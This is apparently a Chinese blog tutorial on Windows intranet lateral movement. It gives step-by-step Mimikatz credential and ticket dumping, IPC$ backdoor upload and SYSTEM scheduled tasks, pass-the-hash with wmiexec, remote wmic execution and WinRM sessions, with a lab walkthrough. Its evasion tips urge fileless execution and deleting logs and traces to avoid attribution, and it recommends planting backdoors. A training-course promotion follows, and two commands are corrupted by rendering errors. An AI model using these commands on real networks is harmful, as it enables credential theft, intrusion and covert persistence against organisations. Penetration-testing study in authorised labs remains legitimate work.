内网横向移动技术总结:IPC$、SMB、WMI、WinRM 实战详解
简介
内网渗透中,拿下第一台机器(跳板机)后,如何渗透整个内网?答案是“横向移动”——利用已获取的凭据(密码、哈希、票据),通过各种协议(IPC$、SMB、WMI等),访问内网其他机器,获取更多权限,最终控制整个内网。本文讲透内网横向移动所有主流手法,附带实战命令和避坑技巧,适合进阶学习。
正文
内网横向移动的核心逻辑:“凭据复用”——通过抓取跳板机上的用户凭据(明文密码、哈希值、票据),利用这些凭据,访问内网其他机器(因为企业内网中,很多用户会在多台机器上使用相同的账号密码),从而实现横向移动。
横向移动的前提:1. 已获取跳板机管理员/System权限(便于抓取凭据);2. 已收集内网存活主机信息(确定移动目标);3. 目标机器开放对应协议端口(如445、135端口)。
下面讲解4种最常用的横向移动技术,从基础到进阶,实操性拉满。
一、凭据抓取(横向移动的前提,核心步骤)
想要横向移动,首先要抓取跳板机上的用户凭据,常用的凭据类型有3种:明文密码、NTLM哈希、Kerberos票据,下面讲解常用的抓取方法。
1. 明文密码抓取
工具:Mimikatz(经典凭据抓取工具,支持抓取明文密码、哈希、票据)
实操步骤(Meterpreter Shell中):
上传Mimikatz工具:upload /root/mimikatz.exe
执行Mimikatz:mimikatz.exe
提升权限:privilege::debug (获取调试权限,否则无法抓取凭据)
抓取明文密码:sekurlsa::logonpasswords (会显示所有登录过该机器的用户明文密码、哈希值)
2. NTLM哈希抓取
若无法抓取明文密码(如系统开启了密码保护),可抓取NTLM哈希,通过“哈希传递(PTH)”实现横向移动。
实操步骤:
使用Mimikatz抓取哈希:sekurlsa::logonpasswords (哈希值格式:用户名:RID:LM哈希:NTLM哈希)
复制NTLM哈希(如:32ed87bdb5fdc5e9cba88547376818d4),用于后续哈希传递。
3. Kerberos票据抓取(域环境专用)
域环境中,用户登录后会生成Kerberos票据,抓取票据后,可通过“票据传递(PTT)”,无需密码即可访问域内其他机器。
实操步骤(Mimikatz):
抓取票据:sekurlsa::tickets /export (将票据导出到本地)
导入票据:kerberos::ptt 票据文件路径 (导入票据后,即可访问域内其他机器)
二、常用横向移动技术(实战详解)
1. IPC$ 连接(基础款,最常用)
原理:IPC$(Inter-Process Communication)是Windows的进程间通信协议,可用于远程连接目标机器,上传文件、执行命令,前提是知道目标机器的用户凭据。
常用命令:
建立IPCKaTeX parse error: Undefined control sequence: \ipc at position 18: …:net use \\目标IP\̲i̲p̲c̲“密码” /user:用户名 (如:net use \192.168.10.101\ipc$ “123456” /user:test\admin)
上传文件到目标机器:copy 本地文件路径 \目标IP\ipc$ (如:copy backdoor.exe \192.168.10.101\ipc$)
执行命令(需结合计划任务):schtasks /create /s 目标IP /tn 任务名 /tr 命令路径 /sc onstart /ru system /f (创建计划任务,执行恶意命令)
删除IPCKaTeX parse error: Undefined control sequence: \ipc at position 18: …:net use \\目标IP\̲i̲p̲c̲/del
注意:目标机器需开放445端口,且管理员开启了IPC$服务(默认开启)。
2. SMB 协议横向移动(高效款,支持无文件执行)
原理:SMB(Server Message Block)协议是Windows文件共享协议,可通过SMB协议远程执行命令,无需上传恶意文件,隐蔽性更强。
工具:Impacket工具集(smbclient、wmiexec、psexec)
实操步骤(使用wmiexec):
执行命令(明文密码):wmiexec.exe 用户名:密码@目标IP “命令” (如:wmiexec.exe test\admin:123456@192.168.10.101 “whoami”)
哈希传递(无明文密码):wmiexec.exe -hashes :NTLM哈希 用户名@目标IP “命令” (如:wmiexec.exe -hashes :32ed87bdb5fdc5e9cba88547376818d4 test\admin@192.168.10.101 “whoami”)
若执行成功,会返回目标机器的命令执行结果,若返回管理员权限,说明横向移动成功。
3. WMI 协议横向移动(隐蔽款,不易被检测)
原理:WMI(Windows Management Instrumentation)是Windows的管理协议,可用于远程管理目标机器,执行命令、查询信息,无文件执行,隐蔽性强,适合企业内网环境。
常用命令:
远程执行命令(明文密码):wmic /node:目标IP /user:用户名 /password:密码 process call create “命令” (如:wmic /node:192.168.10.101 /user:test\admin /password:123456 process call create “cmd.exe /c whoami > C:\test.txt”)
查看目标机器进程:wmic /node:目标IP /user:用户名 /password:密码 process list brief
注意:目标机器需开放135端口,且开启WMI服务(默认开启)。
4. WinRM 协议横向移动(进阶款,域环境常用)
原理:WinRM(Windows Remote Management)是Windows远程管理协议,是PowerShell远程管理的基础,可通过PowerShell远程执行命令,适合域环境下的横向移动。
实操步骤:
测试目标机器WinRM是否开启:Test-WSMan 目标IP (PowerShell命令,若返回正常信息,说明已开启)
远程连接目标机器:Enter-PSSession -ComputerName 目标IP -Credential 用户名 (输入密码后,进入目标机器的PowerShell会话)
执行命令:whoami、ipconfig等,获取目标机器信息,完成横向移动。
注意:目标机器需开放5985(HTTP)、5986(HTTPS)端口,且开启WinRM服务(域控制器默认开启)。
三、横向移动避坑技巧(新手必看)
避免频繁暴力破解:频繁尝试凭据,会触发企业安全告警,建议先通过信息收集,缩小凭据范围,再尝试连接。
隐蔽性优先:优先使用无文件执行方式(WMI、WinRM),避免上传大量恶意文件,减少被检测的风险。
利用域环境凭据复用:域环境中,域管理员账号可访问所有域内机器,若抓取到域管理员凭据,可直接横向移动到域控制器。
清理连接痕迹:横向移动后,删除IPC$连接、计划任务、命令执行日志,避免被溯源。
四、实战演示
靶场环境:域环境(域:test.com),跳板机(Windows 10,IP:192.168.10.102,已获取System权限),目标机器(Windows 7,IP:192.168.10.101,域内机器)。
抓取凭据:使用Mimikatz抓取到域管理员凭据(用户名:test\admin,NTLM哈希:32ed87bdb5fdc5e9cba88547376818d4)。
横向移动:使用wmiexec工具,通过哈希传递连接目标机器:wmiexec.exe -hashes :32ed87bdb5fdc5e9cba88547376818d4 test\admin@192.168.10.101 “whoami”
执行结果:返回“test\admin”,说明已成功获取目标机器管理员权限,横向移动成功。
后续操作:上传后门程序,建立持久连接,继续渗透其他内网机器。
总结:内网横向移动的核心是“凭据复用+协议利用”,新手可先掌握IPC$、SMB两种基础方式,再逐步学习WMI、WinRM进阶方式,结合凭据抓取技巧,就能实现内网全网渗透。实操时务必注意隐蔽性,避免触发安全告警。
网络安全的知识多而杂,怎么科学合理安排?
下面给大家总结了一套适用于网安零基础的学习路线,应届生和转行人员都适用,学完保底6k!就算你底子差,如果能趁着网安良好的发展势头不断学习,日后跳槽大厂、拿到百万年薪也不是不可能!
初级网工
1、网络安全理论知识(2天)
①了解行业相关背景,前景,确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。(非常重要)
2、渗透测试基础(一周)
①渗透测试的流程、分类、标准
②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察
④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等
3、操作系统基础(一周)
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全(系统入侵排查/系统加固基础)
4、计算机网络基础(一周)
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析(HTTP、TCP/IP、ARP等)
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御:主动/被动攻击、DDOS攻击、CVE漏洞复现
5、数据库基础操作(2天)
①数据库基础
②SQL语言基础
③数据库安全加固
6、Web渗透(1周)
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具:Nmap、BurpSuite、SQLMap、其他(菜刀、漏扫等)
恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;如果等保模块学的好,还可以从事等保工程师。薪资区间6k-15k
到此为止,大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗?
【“脚本小子”成长进阶资源领取】
7、脚本编程(初级/中级/高级)
在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力.
零基础入门,建议选择脚本语言Python/PHP/Go/Java中的一种,对常用库进行编程学习; 搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP, IDE强烈推荐Sublime; ·Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完; ·用Python编写漏洞的exp,然后写一个简单的网络爬虫; ·PHP基本语法学习并书写一个简单的博客系统; 熟悉MVC架构,并试着学习一个PHP框架或者Python框架 (可选); ·了解Bootstrap的布局或者CSS。
8、超级网工
这部分内容对零基础的同学来说还比较遥远,就不展开细说了,贴一个大概的路线。感兴趣的童鞋可以研究一下,不懂得地方可以【点这里】加我耗油,跟我学习交流一下。
网络安全工程师企业级学习路线
如图片过大被平台压缩导致看不清的话,可以【点这里】加我耗油发给你,大家也可以一起学习交流一下。
一些我自己买的、其他平台白嫖不到的视频教程:
需要的话可以扫描下方卡片加我耗油发给你(都是无偿分享的),大家也可以一起学习交流一下。
结语
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
特别声明:
此教程为纯技术分享!本书的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本书的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失!!!